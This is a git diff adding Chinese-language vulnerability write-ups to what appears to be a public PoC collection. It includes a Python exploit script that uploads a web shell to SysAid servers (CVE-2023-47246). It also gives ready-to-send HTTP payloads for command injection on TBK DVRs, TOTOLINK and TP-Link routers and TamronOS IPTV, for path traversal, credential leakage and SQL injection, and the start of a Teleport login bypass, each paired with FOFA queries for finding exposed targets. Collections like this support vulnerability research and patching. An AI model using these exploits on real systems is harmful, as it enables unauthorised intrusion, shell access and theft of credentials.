+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
+        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
+        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
+        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',
+        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8',
+        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
+        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',
+        'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
+        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
+        'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50',
+        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0',
+        'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',
+        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7',
+        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
+        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
+        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
+        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko',
+        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'
+    ]
+    return agent_list[random.randint(0, len(agent_list) - 1)]
+
+
+def shellUpload(url, proxy, directoryName, shellFile):
+    userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="
+    headers = {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "User-Agent": get_random_agent()
+    }
+    shellFileName = shellFile.split(".")[0]
+    warFile = f"{shellFileName}.war"
+    if compressFile(shellFile, warFile):
+        shellHex = getHexData(warFile=warFile)
+        data = binascii.unhexlify(shellHex)
+        resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)
+        print("\033[92m[+] Shell file compressed successfully!\033[0m")
+        return resp
+    else:
+        print("\033[91m[x] Shell file compression failed.\033[0m")
+        exit(0)
+
+
+def shellTest(url, proxy, directoryName, shellFile):
+    userEntryUrl = f"{url}/{directoryName}/{shellFile}"
+    headers = {
+        "User-Agent": get_random_agent()
+    }
+    resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)
+    return resp, userEntryUrl
+
+def exploit(url, proxy, shellFile):
+    print(f"\033[94m[*] start to attack: {url}\033[0m")
+    directoryName = generateRandomDirectoryName(5)
+    userentryResp = shellUpload(url, proxy, directoryName, shellFile)
+    print(f"\033[94m[*] Wait 9 seconds...\033[0m")
+    time.sleep(9)
+    cveTestResp, userEntryUrl = shellTest(url, proxy, directoryName, shellFile)
+    if userentryResp.status_code == 200 and cveTestResp.status_code == 200:
+        print(f"\033[92m[+] The website [{url}] has vulnerability CVE-2023-47246! Shell path: {userEntryUrl}\033[0m")
+    else:
+        print(f"\033[91m[x] The website [{url}] has no vulnerability CVE-2023-47246.\033[0m")
+
+
+if __name__ == "__main__":
+    banner = """
+  ______     _______     ____   ___ ____  _____       _  _ _____ ____  _  _    __   
+ / ___\ \   / / ____|   |___ \ / _ \___ \|___ /      | || |___  |___ \| || |  / /_  
+| |    \ \ / /|  _| _____ __) | | | |__) | |_ \ _____| || |_ / /  __) | || |_| '_ \ 
+| |___  \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__   _/ /  / __/|__   _| (_) |
+ \____|  \_/  |_____|   |_____|\___/_____|____/         |_|/_/  |_____|  |_|  \___/ 
+                                                                                Author: W01fh4cker
+                                                                                Blog: https://w01fh4cker.github.io
+        """
+    print(banner)
+    parser = argparse.ArgumentParser(description="SysAid Server remote code execution vulnerability CVE-2023-47246 Written By W01fh4cker",
+        add_help="eg: python CVE-2023-47246-RCE.py -u https://192.168.149.150:8443")
+    parser.add_argument("-u", "--url", help="target URL")
+    parser.add_argument("-p", "--proxy", help="proxy, eg: http://127.0.0.1:7890")
+    parser.add_argument("-f", "--file", help="shell file, eg: shell.jsp")
+    args = parser.parse_args()
+    if args.url.endswith("/"):
+        url = args.url[:-1]
+    else:
+        url = args.url
+    if args.proxy:
+        proxy = {
+            'http': args.proxy,
+            'https': args.proxy
+        }
+    else:
+        proxy = {}
+    exploit(url, proxy, args.file)
+
+```
+
+## 漏洞脚本来源
+```
+https://github.com/W01fh4cker/CVE-2023-47246-EXP
+```
diff --git a/TBKDVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721).md b/TBKDVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721).md
new file mode 100644
index 0000000..8d06704
--- /dev/null
+++ b/TBKDVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721).md
@@ -0,0 +1,27 @@
+# TBK DVR硬盘录像机device存在远程代码执行漏洞(CVE-2024-3721)
+
+**一、漏洞简介**  
+ TBK DVR硬盘录像机是专业的视频监控设备，支持高清录制、远程监控和智能分析等功能，为各种场所提供稳定可靠的安全监控解决方案。该产品device.rsp 接口处存在命令执行漏洞，未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令，写入后门文件，获取录像机shell权限。    
+**二、影响版本**  
+TBK DVR-4104
+
+TBK DVR-4216  
+**三、资产测绘**  
+●fofa `"Location: /login.rsp"`![1715357452117-0503040a-73a2-4977-b9b6-9a4cacebc1c9.png](./img/nL3f78cvd3-lc5rB/1715357452117-0503040a-73a2-4977-b9b6-9a4cacebc1c9-380767.png)  
+**四、漏洞复现**
+
+```yaml
+GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;pwd;ls HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Cookie: uid=1
+```
+
+![1715357380708-66eba540-fa97-4730-8826-a3a88312db04.png](./img/nL3f78cvd3-lc5rB/1715357380708-66eba540-fa97-4730-8826-a3a88312db04-601760.png)
+
+
+
+
+
+> 更新: 2024-05-13 11:48:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sg4z4l6xsevsochr>
\ No newline at end of file
diff --git a/TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md b/TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md
new file mode 100644
index 0000000..47e90eb
--- /dev/null
+++ b/TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md
@@ -0,0 +1,33 @@
+
+## TOTOLINK A3700R命令执行漏洞CVE-2023-46574
+TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞，攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。   
+
+## 影响版本：
+```
+TOTOLINK A3700R v9.1.2u.6165_20211012
+```
+
+
+## poc
+```
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Host: 192.168.122.15
+Content-Length: 73
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.122.15
+Referer: http://192.168.122.15/basic/index.html?time=1697964093345
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: SESSION_ID=2:1697964047:2
+Connection: close
+
+
+{"topicurl":"UploadFirmwareFile","FileName":";ls;"}
+```
+![image](https://github.com/wy876/POC/assets/139549762/37a0b1f8-101e-4642-b9fa-3fda6f31f079)
+
+## 来源
+- https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
diff --git a/TOTOLINK存在泄漏账号密码泄露漏洞.md b/TOTOLINK存在泄漏账号密码泄露漏洞.md
new file mode 100644
index 0000000..10ee303
--- /dev/null
+++ b/TOTOLINK存在泄漏账号密码泄露漏洞.md
@@ -0,0 +1,25 @@
+# TOTOLINK存在泄漏账号密码泄露漏洞
+
+# 一、漏洞简介
+TOTOLINK存在泄漏账号密码泄露漏洞
+
+# 二、影响版本
++ TOTOLINK
+
+# 三、资产测绘
++ fofa`"TOTOLINK"`
++ 特征
+
+![1722616502911-6584fab6-2545-4c39-afba-b538b3d04fea.png](./img/un9vgxuKVLRXxw_9/1722616502911-6584fab6-2545-4c39-afba-b538b3d04fea-761611.png)
+
+# 四、漏洞复现
+```http
+/cgi-bin/ExportSettings.sh
+```
+
+![1722616415949-91023cc8-2ab9-4181-9d4b-a413b02d7045.png](./img/un9vgxuKVLRXxw_9/1722616415949-91023cc8-2ab9-4181-9d4b-a413b02d7045-360549.png)
+
+
+
+> 更新: 2024-08-12 17:15:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dkxfq1s0ol3ebges>
\ No newline at end of file
diff --git a/TOTOLINK远程代码执行漏洞(CVE-2024-51228).md b/TOTOLINK远程代码执行漏洞(CVE-2024-51228).md
new file mode 100644
index 0000000..abb7636
--- /dev/null
+++ b/TOTOLINK远程代码执行漏洞(CVE-2024-51228).md
@@ -0,0 +1,32 @@
+# TOTOLINK远程代码执行漏洞(CVE-2024-51228)
+
+TOTOLINK远程代码执行漏洞(CVE-2024-51228)
+
+## 影响版本
+
+- TOTOLINK-CX-A3002RU-V1.0.4-B20171106.1512
+- TOTOLINK-CX-N150RT-V2.1.6-B20171121.1002
+- TOTOLINK-CX-N300RT-V2.1.6-B20170724.1420
+- TOTOLINK-CX-N300RT-V2.1.8-B20171113.1408
+- TOTOLINK-CX-N300RT-V2.1.8-B20191010.1107
+- TOTOLINK-CX-N302RE-V2.0.2-B20170511.1523
+
+## poc
+
+```
+POST /boafrm/formSysCmd HTTP/1.1
+Host: {Target IP}:{Target Port}
+User-Agent: curl/7.81.0
+Accept: */*
+Content-Length: <length>
+Content-Type: application/x-www-form-urlencoded
+
+sysCmd={shell_cmd}
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities
+- https://xz.aliyun.com/t/16707
\ No newline at end of file
diff --git a/TP-LINKTL-WR940N-命令执行漏洞(CVE-2023-33538).md b/TP-LINKTL-WR940N-命令执行漏洞(CVE-2023-33538).md
new file mode 100644
index 0000000..f90f62b
--- /dev/null
+++ b/TP-LINKTL-WR940N-命令执行漏洞(CVE-2023-33538).md
@@ -0,0 +1,88 @@
+## TP-LINKTL-WR940N 命令执行漏洞（CVE-2023-33538)
+
+```
+The PoC of TL-WR940NV4 is as follows:
+GET
+/JFYRUKOAPAQZRKOC/userRpm/WlanNetworkRpm.htm?ssid1=TP-LINK_000012||reboot;&ssid2=
+TP-LINK_0000_2&ssid3=TP-LINK_0000_3&ssid4=TP-LINK_0000_4&region=101&band=0&mode=6
+&chanWidth=2&channel=15&rate=83&ap=1&broadcast=2&brlssid=&brlbssid=&addrType=1&key
+type=1&wepindex=1&authtype=1&keytext=&Save=Save HTTP/1.1
+Host: 127.0.0.1:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer: http://127.0.0.1:8081/JFYRUKOAPAQZRKOC/userRpm/WlanNetworkRpm.htm
+Cookie:
+Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3
+D
+Upgrade-Insecure-Requests: 1
+
+
+The PoC of TL-WR940NV2 is as follows:
+GET
+/UJOGPJXBZUFEBUDB/userRpm/WlanNetworkRpm.htm?ssid1=;reboot;&ssid2=TP-LINK_0000_2&
+ssid3=TP-LINK_0000_3&ssid4=TP-LINK_0000_4&region=101&band=0&mode=5&chanWidth=1&c
+hannel=9&rate=59&ap=1&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex =1&authtype=1&keytext=&Save=Save HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer: http://192.168.0.1/KMODQNKANSQJBYFA/userRpm/WlanNetworkRpm.htm
+Cookie:
+Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3
+D
+Upgrade-Insecure-Requests: 1
+
+
+The PoC of TL-WR841N V8 is as follows:
+GET
+/userRpm/WlanNetworkRpm.htm?ssid1=a;reboot&ssid2=TP-LINK_000000_2&ssi
+d3=TP-LINK_000000_3&ssid4=TP-LINK_000000_4&region=101&band=0&mode=3&c
+hanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&add
+rType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save HTTP/1.1
+Host: 0.0.0.0:49168
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
+Firefox/91.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;
+q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://0.0.0.0:49168/userRpm/WlanNetworkRpm.htm
+Cookie: Authorization=
+Upgrade-Insecure-Requests: 1
+
+
+The PoC of TL-WR841N V10 is as follows:
+GET
+/GWIDNCGBKQNKXJXB/userRpm/WlanNetworkRpm.htm?ssid1=a;reboot;&ssid2=TP
+-LINK_0000_2&ssid3=TP-LINK_0000_3&ssid4=TP-LINK_0000_4&region=101&ban
+d=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&b
+rlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Sav
+e HTTP/1.1
+Host: 127.0.0.1:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
+Gecko/20100101 Firefox/109.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,imag
+e/webp,*/*;q=0.8
+Accept-Language:
+zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:
+http://127.0.0.1:8081/GWIDNCGBKQNKXJXB/userRpm/WlanNetworkRpm.htm
+Cookie:
+Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDF
+mYzM%3D
+Upgrade-Insecure-Requests: 1
+
+```
diff --git a/TVT数码科技NVMS-1000路径遍历漏洞(CVE-2019-20085).md b/TVT数码科技NVMS-1000路径遍历漏洞(CVE-2019-20085).md
new file mode 100644
index 0000000..7b76376
--- /dev/null
+++ b/TVT数码科技NVMS-1000路径遍历漏洞(CVE-2019-20085).md
@@ -0,0 +1,34 @@
+# TVT数码科技 NVMS-1000 路径遍历漏洞(CVE-2019-20085)
+
+# 一、漏洞简介
+TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件。
+
+# 二、影响版本
++ TVT NVMS-1000  
+
+
+# 三、资产测绘
++ fofa`app="TVT-NVMS-1000"`
++ 特征
+
+![1700225511766-2bbf4f4e-08c7-44c3-89a3-c132169c3127.png](./img/Yw6sGgPk7TOHxl5U/1700225511766-2bbf4f4e-08c7-44c3-89a3-c132169c3127-078553.png)
+
+# 四、漏洞复现
+```plain
+GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: dataPort=6063
+Upgrade-Insecure-Requests: 1
+```
+
+![1700225536790-2040e948-45dc-49ff-a5c2-8d01291eefc6.png](./img/Yw6sGgPk7TOHxl5U/1700225536790-2040e948-45dc-49ff-a5c2-8d01291eefc6-317687.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rpuprdcoqll62nfc>
\ No newline at end of file
diff --git a/TamronOSIPTV系统ping存在命令执行漏洞.md b/TamronOSIPTV系统ping存在命令执行漏洞.md
new file mode 100644
index 0000000..193dd52
--- /dev/null
+++ b/TamronOSIPTV系统ping存在命令执行漏洞.md
@@ -0,0 +1,31 @@
+# TamronOS IPTV系统ping存在命令执行漏洞
+
+# 一、漏洞简介
+TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案。系统提供了多种客户端（Android机顶盒、电视、PC版点播、手机版点播）方便用户通过不同的设备接入。TamronOS IPTV系统ping存在命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ TamronOS IPTV系统
+
+# 三、资产测绘
++ fofa`app="TamronOS-IPTV系统"`
++ 特征
+
+![1706860491374-8545916f-3d24-4853-b41f-e8eff2b2af16.png](./img/tmaUZyNyQBoQjl11/1706860491374-8545916f-3d24-4853-b41f-e8eff2b2af16-092046.png)
+
+# 四、漏洞复现
+```plain
+POST /api/ping?count=5&host=;whoami; HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 0
+Connection: close
+
+```
+
+ ![1706860532468-6f287a9a-0ce8-4de9-8388-66f83d562db2.png](./img/tmaUZyNyQBoQjl11/1706860532468-6f287a9a-0ce8-4de9-8388-66f83d562db2-533809.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy6y35t0g2nad6dw>
\ No newline at end of file
diff --git a/Teaching在线教学平台getDictItemsByTable存在sql注入漏洞.md b/Teaching在线教学平台getDictItemsByTable存在sql注入漏洞.md
new file mode 100644
index 0000000..644e0ed
--- /dev/null
+++ b/Teaching在线教学平台getDictItemsByTable存在sql注入漏洞.md
@@ -0,0 +1,23 @@
+# Teaching在线教学平台getDictItemsByTable存在sql注入漏洞
+
+Teaching 在线教学平台 <= v2.7版本存在SQL注入漏洞，攻击者利用此漏洞可以获取系统敏感数据
+
+## fofa
+
+```javascript
+icon_hash="1778610975"
+```
+
+## poc
+
+```javascript
+GET /api/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/username,password%20'/x.js HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![null](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411012002071.png)
\ No newline at end of file
diff --git a/Teleport堡垒机do-login任意用户登录漏洞.md b/Teleport堡垒机do-login任意用户登录漏洞.md
new file mode 100644
index 0000000..1a16d9b
--- /dev/null
+++ b/Teleport堡垒机do-login任意用户登录漏洞.md
@@ -0,0 +1,91 @@
+# Teleport堡垒机 do-login 任意用户登录漏洞
+
+# 一、漏洞简介
+Teleport堡垒机是一款简单易用的开源堡垒机系统，具有小巧、易用的特点，支持RDP/SSH/SFTP/Telnet协议的远程连接和审计管理。Teleport堡垒机存在任意用户登录漏洞，攻击者通过漏洞可以获取业务后台权限。
+
+# 二、影响版本
++ Teleport堡垒机<= 20220817  
+
+
+# 三、资产测绘
++ hunter`app.name="Teleport 堡垒机系统"`
++ 特征
+
+![1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218.png](./img/W8kMt7wlSfRQcUAD/1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218-962775.png)
+
+# 四、漏洞复现
+1. 获取验证码
+
+```plain
+GET /auth/captcha?h=36&rnd=0.39124018049760567 HTTP/1.1
+Host: xx.xx.xx.xx
